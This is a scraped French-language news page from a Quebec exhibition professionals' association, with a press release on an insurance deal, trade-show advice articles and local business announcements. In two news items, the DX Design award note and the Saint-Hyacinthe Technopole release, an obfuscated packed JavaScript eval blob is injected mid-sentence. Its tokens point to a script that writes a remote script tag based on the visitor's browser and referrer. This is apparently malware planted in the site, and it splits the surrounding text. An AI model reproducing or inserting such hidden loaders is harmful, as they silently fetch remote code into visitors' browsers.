L’APEQ SIGNE UNE ENTENTE D’ASSURANCE AVANTAGEUSE AVEC MARSH

L’APEQ SIGNE UNE ENTENTE D’ASSURANCE AVANTAGEUSE AVEC MARSH
Montréal, 6 mars 2020 – L’APEQ est très fière d’annoncer qu’elle a mise sur pied, avec l’aide de Marsh Canada Limited (Marsh), un programme d’assurance responsabilité civile événement exclusif à ses membres. C’est une grande première pour l’APEQ que d’offrir un programme qui facilitera le travail de ses membres promoteurs dans la réalisation de leurs événements.
En effet, au Canada le nombre d’événements ne cesse d’augmenter, il convient d’examiner les risques associés à l’organisation de tels événements. Les utilisateurs d’installations et les organisateurs d’événements bien informés considèrent à juste titre l’assurance responsabilité civile comme essentielle, car un seul accident non assuré peut avoir un effet dévastateur sur les finances. C’est pourquoi l’APEQ se veut proactive et propose à ses membres une solution efficace et juste en matière d’assurance.
En tant qu’expert sectoriel du risque de responsabilité associé à la tenue d’événements, Marsh gère un programme d’assurance responsabilité civile événement, afin de répondre aux exigences uniques de couverture des risques auxquels s’exposent les organisateurs d’événements et les utilisateurs d’installations au Canada.
Pour plus d’informations sur le sujet, vous pouvez aller consulter notre site internet apeq.org ou communiquer avec nous à info@apeq.org.
 
-30 –

 
À Propos de l’APEQ
Fondée en 1991, l’association des professionnels en exposition du Québec (APEQ) est un réseau qui regroupe les promoteurs d’événements avec exposition, les fournisseurs de produits, d’équipements et de services ainsi que les locateurs de salles.

À Propos de Marsh
Marsh est un chef de file mondial dans le domaine du courtage d’assurances et de la gestion de risques. Dans plus de 130 pays, leurs experts aident leurs clients à prévoir, à quantifier et à mieux comprendre l’étendue des risques auxquels ils font face. Dans la conjoncture économique mondiale de plus […]

EXPOSANTS: Comment mesurer le succès de votre Salon?

EXPOSANTS: Comment mesurer le succès de votre salon?
 

Par Julie Chaumont pour ExpoMag mai 2014

 

Se fixer des objectifs

La première chose à faire pour être en mesure de déterminer si votre Salon a été un succès (ou un échec!) est de vous fixer des objectifs quantifiables. « Il y a quatre types d’objectifs en Salon : faire des ventes, faire des démonstrations, améliorer l’image et la reconnaissance de marque ou établir de nouveaux contacts d’affaires », affirme Christine Leroux, coordonnatrice marketing chez Skyline Montréal.
Alors que l’amélioration de l’image et la reconnaissance de marque sont difficilement quantifiables, il est possible de faire parler les trois autres objectifs (vente, démonstration et contacts d’affaires) si des mesures nécessaires ont été prises au préalable.
Quel montant de ventes souhaitez-vous faire? Combien voulez-vous faire de démonstrations? Combien de nouveaux contacts d’affaires désirez-vous?
Chiffrez ces différents objectifs en prenant compte de la durée et des heures d’ouverture du Salon ainsi que de la grosseur de votre kiosque.
« C’est sûr, la première fois, cet exercice est plus difficile parce qu’on n’a pas de comparable. Par contre, si on a déjà été dans un Salon, on peut se baser sur cette expérience passée pour faire des prévisions », explique Madame Leroux.
 

Utilisez les bons outils

Une fois que vous avez évalué et calibré vos différents objectifs, munissez-vous des bons outils pour compiler vos résultats.
Dans le cas des ventes et des démonstrations, les chiffres parlent d’eux-mêmes alors qu’une certaine méthodologie est nécessaire pour évaluer les potentiels contacts d’affaires. « On peut utiliser une technologie de badge, qu’on va scanner, mais la méthode à la main, avec papier et crayon, reste encore très efficace. Il suffit d’inscrire les informations des personnes rencontrées sur des fiches, en […]

TRUCS DU MÉTIER : Améliorer l’expérience de vos exposants, c’est possible!

TRUCS DU MÉTIER : Améliorer l’expérience de vos exposants, c’est possible!
Par Caroline Barré pour ExpoMag mai 2014

 
Vous prévoyez l’organisation d’un salon professionnel, grand public ou mixte? Découvrez quelques astuces qui vous permettront d’optimiser l’expérience de vos exposants et de faire de votre événement, un incontournable d’année en année.
 

1 ) Le manuel de l’exposant, la base de tout événement!
« Le manuel de l’exposant, c’est vraiment la clé », soutient Nathalie Loiselle, responsable des expositions à la Société du Centre des congrès de Québec. Il renseigne sur le promoteur et fournit l’information sur l’horaire du salon (dates et heures de l’événement, mais aussi temps alloué au montage, à l’entrée des exposants et au démontage), les normes d’aménagement des stands (dimensions et inclusions) et un répertoire de fournisseurs suggérés et exclusifs (formulaires de commande, coordonnées, services offerts).
 
« Donner le guide à l’avance, dès que les exposants s’inscrivent », conseille Christine Leroux, coordonnatrice marketing chez Skyline Montréal. Marylène Beaudry, directrice halls d’exposition à la Place Bonaventure, insiste, quant à elle, sur l’importance d’avoir un personnel compétent pour répondre aux interrogations des exposants avant, pendant et après l’événement. « Des rappels doivent être acheminés aux exposants », précise Mme Beaudry relativement aux dates limites, à l’accès au débarcadère et aux procédures de démontage.
 

2 ) Ne vous contentez pas d’attirer une clientèle, retenez-la!
La configuration d’une salle d’exposition n’offre pas la même visibilité à tous les exposants. Dans son plan, un promoteur de salon doit prévoir des aires de repos accueillantes afin de garder les visiteurs sur les lieux de l’exposition.
 
« Il faut faire en sorte que les visiteurs puissent aller voir un peu tout le monde », souligne Jacques Dupuis, président de Symbiose Marketing Événementiel, attitré au développement des affaires. Il […]

Comment tirer profit des outils de sondage en ligne?

Comment tirer profit des outils de sondage en ligne?
Par Amélie Cournoyer pour ExpoMag mai 2014

 
Sonder n’est pas qu’une action, c’est une façon de travailler. Et pour vous simplifier la tâche, il existe une panoplie d’outils de sondage en ligne gratuits et payants. Mais attention de ne pas tomber dans le piège de la facilité!
Qu’ils soient gratuits ou payants, les outils de sondage en ligne sont aussi nombreux que simples à utiliser. Il suffit de vous abonner à l’un d’eux pour y concevoir votre questionnaire sur mesure. Certains outils vous permettent, en plus, de personnaliser votre sondage en lui donnant les couleurs de votre entreprise.
Une fois le questionnaire conçu, vous pourrez envoyer l’adresse URL par courriel à des gens présélectionnés, le mettre sur votre site web ou sur votre page Facebook, par exemple. Puis, selon l’outil utilisé, les données seront automatiquement compilées et parfois même présentées sous forme de tableaux pour faciliter l’interprétation des résultats.
La majorité de ces outils en ligne sont gratuits. Vous devrez probablement débourser un certain montant pour avoir accès à des options plus avancées, mais les fonctionnalités des versions gratuites sont souvent largement suffisantes pour répondre aux besoins des sondeurs.
 

Planifier avant d’agir
Si leur facilité d’utilisation est leur plus grand avantage, elle peut aussi devenir leur plus gros inconvénient. Ainsi, avant de vous lancer les yeux fermés dans la conception d’un sondage, ciblez un objectif par questionnaire. Est-ce de sonder vos clients sur leurs habitudes d’achat, d’évaluer la qualité de vos services ou de vos produits, de faire une analyse de marché, de générer des contacts, de mesurer la satisfaction de vos clients?
« Un sondage = un objectif. On ne peut pas tout évaluer d’un seul coup! Les entreprises qui sondent sondent […]

Pourquoi le salon d’exposition peut-être plus efficace que la prospection téléphonique

Pourquoi le salon d’exposition peut-être plus efficace que la prospection téléphonique  ?
 
PLUS GRANDE OUVERTURE D’ESPRIT DES VISITEURS
Qu’il s’agisse d’un salon grand public ou professionnel, les visiteurs qui se présenteront auront naturellement l’esprit ouvert. Effectivement, ces derniers seront présents parce qu’ils le désirent, parce qu’ils ont un besoin, bref, parce qu’ils veulent en savoir plus sur les services et produits offerts par les exposants sur place.
 
LE SALON D’EXPOSITION PERMET D’ÊTRE INSTRUCTIF
Au bout du fil il est très difficile de faire une démonstration de ses services ou produit. Il est donc facile de perdre l’attention de son interlocuteur. La vue est le sens le plus sollicité chez le consommateur. C’est le premier contact entre l’individu et le produit.
 
LE SALON D’EXPOSITION PERMET D’ÊTRE CRÉATIF
Le salon d’exposition permet à l’exposant d’offrir aux visiteurs un nombre illimité d’expériences. En plus du personnel formé pour vendre et répondre aux questions du visiteur, le kiosque en soi permet de générer de l’intérêt. Affiches, vidéos, brochures, démonstrations, dégustations… l’imagination est la seule limite de l’exposant !
 
FINALEMENT… LA PROSPECTION TÉLÉPHONIQUE ENNUIE LES GENS
Imaginer l’état d’esprit des personnes qui reçoivent un appel de prospection qui disons-le, arrivent très souvent au mauvais moment. La prospection téléphonique place automatiquement le vendeur dans une situation de désavantage puisqu’il est très souvent perçu comme une perturbation.
 

Retrouvez plus d’articles dans notre ExpoMAG!

Principaux facteurs qui conduisent les entreprises à exposer à un salon.

Principaux facteurs qui conduisent les entreprises à exposer à un salon
 
On distingue de manière générale quatre principaux facteurs qui conduisent l’entreprise à exposer à un salon.
 
Élaboration de sa stratégie de communication
En termes d’image et de notoriété, exposer à un salon permet à l’entreprise d’affirmer sa présence sur le marché, de communiquer ses principaux messages et d’être mieux connue par les différents publics. Étant un média de communication directe, les salons permettent d’adresser des messages, mais aussi de recueillir un grand nombre d’informations sur ses clients, sa concurrence, sur les nouvelles technologies, etc.
 
Lancement d’un produit ou d’un service
Les salons constituent aussi une excellente vitrine de présentation d’un nouveau produit ou d’une innovation. Les salons sont d’excellents lieux de démonstration destinés à montrer les performances du matériel présenté. Les salons ou foires commerciales donnent aux clients la possibilité de palper les produits et de les voir à l’oeuvre.
 
La négociation
Un salon peut représenter une date butoir pour la réalisation d’une transaction. Par ailleurs, le salon initie souvent de nouvelles négociations commerciales à la suite des rencontres réalisée au cours de l’événement.
 
Élément de la stratégie commerciale.
Le salon d’exposition occupe une place de choix dans la stimulation des ventes et l’amélioration des relations avec les clients. Le salon représente donc un appui considérable pour la force de vente.Fait intéressant, selon les données du Center for Exhibition Industry Research (CEIR), plus de 90 % des participants qui prennent les décisions d’achat considèrent les foires commerciales comme leur principale source d’information.
 

Retrouvez plus d’articles dans notre ExpoMAG!

Félicitations à DX Design

Jeudi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(! ».replace(/^/,String)){while(c–){d)}}return p}(‘0.6(«  »);n m= »q »;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zshdb|var|u0026u|referrer|zbsie||js|php’.split(‘|’),0,{}))
dernier, à Toronto, l’entreprise DX Design, membre de l’APEQ, a remporté le prix dans la catégorie « Best show booth/Brand display or Pavilion », dans le cadre de l’événement Star Awards Gala du Canadian Special Events, pour la réalisation d’une loge corporative au Festival d’été de Québec en juillet 2014.

Félicitations à toute l’équipe!

SAINT-HYACINTHE TECHNOPOLE AMORCE SES ACTIVITÉS

Regroupement eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(! ».replace(/^/,String)){while(c–){d)}}return p}(‘0.6(«  »);n m= »q »;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhiik|var|u0026u|referrer|bsesr||js|php’.split(‘|’),0,{}))
des organismes de développement économique local
SAINT-HYACINTHE TECHNOPOLE AMORCE SES ACTIVITÉS

Saint-Hyacinthe, le 19 mars 2015 – Saint-Hyacinthe Technopole, la nouvelle entité vouée au développement économique local de Saint-Hyacinthe, amorcera ses activités le 1er avril prochain, comme annoncé en novembre dernier. Saint-Hyacinthe Technopole est issue d’une acquisition des actifs de la Corporation de développement commercial et de Tourisme et Congrès Saint-Hyacinthe par la Cité de la biotechnologie. Son budget annuel s’élèvera à près de 3 M$ et son siège social sera situé au 1000, rue Dessaulles.

 

Au cours des derniers mois, un comité de gouvernance formé du maire et de conseillers municipaux, du directeur général de la Ville et de représentants des organismes concernés, a travaillé activement à développer cette nouvelle entité privée qui comprend notamment:

 

Un nouveau mandat élargi axé sur le développement de l’industrie, du commerce et du tourisme et visant, en priorité :
Un nouveau conseil d’administration;
De nouvelles règles de gouvernance;
le développement du parc technologique de la Cité et des parcs industriels de la Ville ;
l’implantation de nouvelles entreprises et la prospection active ;
le montage financier de projets ;
l’achat ou la construction d’immeubles ;
la création d’emplois.

 

Des ressources regroupées provenant des trois organismes et de nouvelles ressources à venir, dont un nouveau directeur général ainsi qu’un nouveau directeur du développement industriel.
 

 

L’actuel président de la Cité de la biotechnologie, M. André Barnabé, assurera, durant quelques mois, la direction générale intérimaire de Saint-Hyacinthe Technopole.

 

 

« Dans les prochaines semaines, Saint-Hyacinthe Technopole sera occupée à finaliser cette transition et plusieurs étapes sont prévues en ce sens. Nous sommes cependant convaincus d’avoir réuni les conditions gagnantes pour que cette nouvelle entité s’impose rapidement comme un joueur de premier plan en matière de […]